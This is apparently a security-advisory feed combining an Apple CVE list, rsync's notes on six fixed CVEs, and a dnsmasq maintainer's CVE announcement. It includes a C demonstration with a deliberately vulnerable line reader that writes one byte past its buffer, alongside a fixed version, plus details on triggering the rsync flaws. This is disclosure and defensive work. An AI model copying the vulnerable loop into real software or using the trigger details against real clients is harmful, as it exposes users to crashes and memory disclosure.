We would like to acknowledge Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs for their assistance.

We would like to acknowledge Muhammad Zaid Ghifari (Mr.ZheeV), Kalimantan Utara, Qadhafy Muhammad Tera, Vitaly Simonovich for their assistance.

We would like to acknowledge Hyeonji Son (@jir4vv1t) of Demon Team for their assistance.

We would like to acknowledge Kun Peeks (@SwayZGl1tZyyy) for their assistance.

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: May 11, 2026


Related vulnerabilities: CVE-2026-28974, CVE-2026-28995, CVE-2026-28985, CVE-2026-28993, CVE-2026-28942, CVE-2026-28902, CVE-2026-28978, CVE-2026-28986, CVE-2026-28947, CVE-2026-28847, CVE-2026-28944, CVE-2026-28992, CVE-2026-28953, CVE-2026-28987, CVE-2026-43660, CVE-2026-28905, CVE-2026-28925, CVE-2026-39871, CVE-2026-28954, CVE-2026-28988, CVE-2026-39869, CVE-2026-43661, CVE-2026-28819, CVE-2026-28919, CVE-2026-28952, CVE-2026-28907, CVE-2026-43655, CVE-2026-28994, CVE-2026-28940, CVE-2026-28846, CVE-2026-28990, CVE-2026-28901, CVE-2026-28962, CVE-2026-28969, CVE-2026-28956, CVE-2026-28959, CVE-2026-28977, CVE-2026-39870, CVE-2026-28913, CVE-2026-28906, CVE-2026-28996, CVE-2026-28971, CVE-2026-1837, CVE-2026-43666, CVE-2026-28941, CVE-2026-28914, CVE-2026-43653, CVE-2026-28903, CVE-2026-43652, CVE-2026-28920, CVE-2026-28976, CVE-2026-28991, CVE-2026-43659, CVE-2026-43658, CVE-2026-43654, CVE-2026-28897, CVE-2026-28915, CVE-2026-28924, CVE-2026-28848, CVE-2026-28972, CVE-2026-28936, CVE-2026-28929, CVE-2026-28917, CVE-2026-28951, CVE-2026-43656, CVE-2026-28918, CVE-2026-28943, CVE-2026-28946, CVE-2026-28923, CVE-2026-43668, CVE-2026-28883, CVE-2026-28904, CVE-2026-28958, CVE-2026-28922, CVE-2026-28983, CVE-2026-28955, CVE-2026-28961, CVE-2026-28908, CVE-2026-28930

https://download.samba.org/pub/rsync/NEWS.html

SECURITY FIXES: Six CVEs are fixed in this release. All six are assigned by VulnCheck as CNA. Affected versions are 3.4.2 and earlier in every case. Three of the six (CVE-2026-29518, CVE-2026-43617, CVE-2026-43619) require non-default daemon configuration to reach: the first and third need use chroot = no for a module, the second needs daemon chroot = ... set in rsyncd.conf. Two (CVE-2026-43618, CVE-2026-43620) are reachable from a normal pull or a normal authenticated daemon connection. The sixth (CVE-2026-45232) is reachable only when RSYNC_PROXY is set and the proxy (or a MITM) returns a pathological response. Many thanks to the external researchers who reported these issues.

CVE-2026-29518 (CVSS v4.0 7.3, HIGH): TOCTOU symlink race condition allowing local privilege escalation in daemon mode without chroot. An rsync daemon configured with "use chroot = no" was exposed to a time-of-check / time-of-use race on parent path components: a local attacker with write access to a module could replace a parent directory component with a symlink between the receiver's check and its open(), redirecting reads (basis-file disclosure) and writes (file overwrite) outside the module. Default "use chroot = yes" is not exposed. secure_relative_open() (added in 3.4.0 for CVE-2024-12086) was previously unused in the daemon-no-chroot case; the fix enables it there and reroutes the sender's read-path opens through it. Reported by Nullx3D (Batuhan Sancak), Damien Neil and Michael Stapelberg.

CVE-2026-43617 (CVSS v3.1 4.8, MEDIUM): Hostname/ACL bypass on an rsync daemon configured with daemon chroot = /X in rsyncd.conf when the chroot tree lacks DNS resolution support. The reverse-DNS lookup of the connecting client was performed after the daemon chroot had been entered; if /X did not contain the libc resolver fixtures (/etc/resolv.conf, /etc/nsswitch.conf, /etc/hosts, NSS service modules) the lookup failed and the connecting hostname was set to "UNKNOWN", causing hostname-based deny rules to silently fail open. IP-based ACLs are unaffected. The per-module use chroot setting is unrelated to this issue. The fix performs the lookup before entering the daemon chroot. Reported by MegaManSec.

CVE-2026-43618 (CVSS v3.1 8.1, HIGH): Integer overflow in the compressed-token decoder enabling remote memory disclosure to an authenticated daemon peer. The receiver accumulated a 32-bit signed counter without overflow checking; a malicious sender could trigger an overflow that, with careful manipulation, leaked process memory contents to the attacker (environment variables, passwords, heap and library pointers), significantly weakening ASLR. The fix bounds the counter and adds wire-input validation in several adjacent places (defence-in-depth). Workaround for older releases: refuse options = compress in rsyncd.conf. Reported by Omar Elsayed.

CVE-2026-43619 (CVSS v3.1 6.3, MEDIUM): Symlink races on path-based system calls in "use chroot = no" daemon mode (generalisation of CVE-2026-29518). Earlier fixes for symlink races on the receiver's open() call missed the same race class on every other path-based system call: chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir and lstat. The fix routes each affected path-based syscall through a parent dirfd opened under RESOLVE_BENEATH-equivalent kernel-enforced confinement (openat2 on Linux 5.6+, O_RESOLVE_BENEATH on FreeBSD 13+ and macOS 15+, per-component O_NOFOLLOW walk elsewhere). Default "use chroot = yes" is not exposed. Reported by Andrew Tridgell as a follow-on audit of CVE-2026-29518.

CVE-2026-43620 (CVSS v3.1 6.5, MEDIUM): Out-of-bounds read in the receiver's recv_files() enabling remote denial-of-service of any client pulling from a malicious server (incomplete fix of commit 797e17f). The earlier parent_ndx<0 guard added to send_files() was not applied to the visually-identical block in recv_files(). A malicious rsync server can drive any connecting client into a deterministic SIGSEGV by setting CF_INC_RECURSE in the compatibility flags and sending a crafted file list and transfer record. inc_recurse is the protocol-30+ default, so no special options are required on the victim. Workaround for older releases: --no-inc-recursive on the client. Reported by Pratham Gupta.

CVE-2026-45232 (CVSS v3.1 3.1, LOW): Off-by-one out-of-bounds stack write in the rsync client's HTTP CONNECT proxy handler (establish_proxy_connection() in socket.c). After issuing the CONNECT request, rsync read the proxy's first response line one byte at a time into a 1024-byte stack buffer with the bound cp < &buffer[sizeof buffer - 1]. If the proxy (or a MITM in front of it) returned 1023+ bytes on that first line without a newline terminator, cp exited the loop pointing at a buffer slot the loop never wrote, leaving *cp holding stale stack data from the earlier snprintf() of the outgoing CONNECT request. The post-loop logic then wrote a single \0 one byte past the end of the buffer on the stack. Reach is client-side only, and only when RSYNC_PROXY is set so rsync tunnels an rsync:// connection through an HTTP CONNECT proxy. The written byte is always \0 and the offset is fixed by the buffer size, not attacker-chosen, so this is not an arbitrary-write primitive: practical impact is corruption of one adjacent stack byte and possible later misbehaviour or crash. The fix detects the "buffer filled without finding \n" case explicitly by position and refuses the response with "proxy response line too long". Reported by Aisle Research via Michal Ruprich (rsync-3.4.1-2.el10 QE).
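The off-by-one described above is easiest to see next to its fix. The C below is an added illustration, not rsync's socket.c: read_line_unsafe() is a hypothetical model of the loop shape the entry describes (byte-at-a-time read bounded by cp < &buf[sizeof buf - 1], terminator written after the loop), run on a buffer that carries a canary byte past its logical 1024-byte end so the out-of-bounds write is observable without touching real stack data; read_line_safe() is one hardened form that refuses a full buffer with no newline by position. The byte_source type and the constructed proxy replies are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define LINE_BUF 1024   /* the 1024-byte line buffer described in the advisory */

/* In-memory stand-in for the proxy socket (constructed for this example). */
typedef struct { const char *data; size_t len; size_t pos; } byte_source;

/* Returns 1 and stores one byte in *out, or 0 when the peer has closed. */
static int read_byte(byte_source *s, char *out)
{
    if (s->pos >= s->len) return 0;
    *out = s->data[s->pos++];
    return 1;
}

/* Hypothetical model of the pre-fix pattern (not rsync's code): read one byte
 * at a time with the bound cp < &buf[bufsize - 1], stop on '\n', then write
 * the terminator just past the last byte. When the buffer fills with no
 * newline, cp stops on the never-written last slot (stale data) and cp[1]
 * is one byte past the end of buf. Returns the index the terminator went to. */
static size_t read_line_unsafe(byte_source *s, char *buf, size_t bufsize)
{
    char *cp = buf;
    while (cp < &buf[bufsize - 1]) {
        if (!read_byte(s, cp) || *cp == '\n') break;
        cp++;
    }
    cp[1] = '\0';                 /* off-by-one when cp == &buf[bufsize - 1] */
    return (size_t)(cp + 1 - buf);
}

/* Hardened reader: every slot is written before it is tested, a buffer that
 * fills without a '\n' is refused by position (the "proxy response line too
 * long" case), and the terminator always lands inside buf.
 * Returns 0 with the line (newline stripped) in buf, -1 if the line is too
 * long, -2 if the peer closed before sending a newline. */
static int read_line_safe(byte_source *s, char *buf, size_t bufsize)
{
    size_t n = 0;
    for (;;) {
        char c;
        if (!read_byte(s, &c)) { buf[n] = '\0'; return -2; }
        if (c == '\n')        { buf[n] = '\0'; return 0; }
        if (n == bufsize - 1) { buf[n] = '\0'; return -1; }   /* full, no '\n' */
        buf[n++] = c;
    }
}

/* Constructed proxy reply: n filler bytes, optionally newline-terminated. */
static size_t build_reply(char *out, size_t n, int add_newline)
{
    if (n > LINE_BUF) n = LINE_BUF;
    memset(out, 'A', n);
    if (add_newline) out[n++] = '\n';
    return n;
}

/* Run the unsafe model on a buffer that carries a canary byte just past its
 * logical 1024-byte end. Returns 1 if the canary was overwritten, i.e. the
 * off-by-one fired for a reply of n bytes. */
int unsafe_clobbers_canary(size_t n, int add_newline)
{
    char reply[LINE_BUF + 2], storage[LINE_BUF + 1];
    byte_source s = { reply, 0, 0 };
    s.len = build_reply(reply, n, add_newline);
    memset(storage, 0, sizeof storage);
    storage[LINE_BUF] = 0x5a;
    read_line_unsafe(&s, storage, LINE_BUF);
    return storage[LINE_BUF] != 0x5a;
}

/* The same constructed reply through the hardened reader; returns its status. */
int safe_status(size_t n, int add_newline)
{
    char reply[LINE_BUF + 2], buf[LINE_BUF];
    byte_source s = { reply, 0, 0 };
    s.len = build_reply(reply, n, add_newline);
    return read_line_safe(&s, buf, sizeof buf);
}

/* Hardened reader on a realistic first line; returns the stored length
 * (0 if the line was refused). */
size_t safe_line_len(const char *reply)
{
    char buf[LINE_BUF];
    byte_source s = { reply, strlen(reply), 0 };
    if (read_line_safe(&s, buf, sizeof buf) != 0) return 0;
    return strlen(buf);
}

int main(void)
{
    printf("1023 bytes, no newline: unsafe clobbers canary=%d, safe status=%d\n",
           unsafe_clobbers_canary(1023, 0), safe_status(1023, 0));
    printf("normal CONNECT reply: stored length=%zu\n",
           safe_line_len("HTTP/1.1 200 Connection established\r\n"));
    return 0;
}
```

The canary trips at exactly 1023 bytes without a newline, matching the "1023+ bytes" threshold in the entry, and stays intact one byte short of that or when a newline arrives first; the hardened reader turns the same inputs into explicit refusals rather than a write past the buffer.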

In addition to the six CVE fixes, this release adds defence-in-depth hardening on several adjacent paths: bounded wire-supplied counts and lengths in flist/io/acls/xattrs, a guard against length underflow in cumulative snprintf() callers, a parent block-index bounds check on the receiver, a NULL check in read_delay_line(), a lower ceiling on MAX_WIRE_DEL_STAT to avoid signed-int overflow in the read_del_stats() accumulator, rejection of hyphen-prefixed remote-shell hostnames (defence-in-depth against argv-injection in tooling that forwards untrusted input into the hostspec position; reported by Aisle Research via Michal Ruprich), and a NULL-check on localtime_r() in timestring() to keep a malicious server from crashing the client by advertising a file with an out-of-range modtime.


Related vulnerabilities: CVE-2026-43618, CVE-2024-12086, CVE-2026-45232, CVE-2026-43620, CVE-2026-43619, CVE-2026-43617, CVE-2026-29518

Today, 11th May 2026, CERT is releasing a set of six CVEs for serious security vulnerabilities in dnsmasq. These are all long-standing bugs which apply to pretty much all non-ancient versions. The CVE has been pre-disclosed to vendors, so hopefully they will be releasing patched versions of their dnsmasq packages in a timely manner.

Details and patches are available on the website at

https://thekelleys.org.uk/dnsmasq/CVE/

and I have made a "2.92rel2" release of the current 2.92 dnsmasq stable release which is downloadable from the usual place and has had these patches applied.

At the same time, the commits which fix these bugs in the development tree will be uploaded. Some of these use the same patches as the backports, but some are more comprehensive re-writes to tackle root-causes.

There has been something of a revolution in AI-based security research, and I've spent a lot of time over the last couple of months dealing with bug reports, weeding duplicates (so many duplicates!) and triaging bugs into those which need vendor pre-disclosure and those which it's better to make public and fix immediately. Those judgements have been necessarily subjective, but given the number of times "good guys" have found these bugs, there's no doubt that "bad guys" have been able to do the same, so long embargoes seem kind of pointless. There's also the problem that the amount of time and effort, for all actors, needed to co-ordinate an embargo and provide backports is huge. I think the priority for most bugs is to fix them going forward, and have new dnsmasq releases as bug-free as possible. To this end, you may have noticed that there have been a lot of security-fix commits to the git repo in the weeks prior to this announcement.

I will shortly tag dnsmasq-2.93rc1 and the aim is to get a stable 2.93 release done ASAP. Testing of the release candidate by members here is important and I'd like to encourage anyone who can to do that as soon as they can. With luck, 2.93 could be out in a week or so.

The tsunami of AI-generated bug reports shows no signs of stopping, so it is likely that this process will have to be repeated again soon. There's a tension between getting as much as possible of the ongoing bug stream fixed in 2.93 and its timely release. I plan to prioritise timeliness, and keep working after that as necessary.


Related vulnerabilities: CVE-2026-4892, CVE-2026-2291, CVE-2026-4891, CVE-2026-5172, CVE-2026-4890, CVE-2026-4893
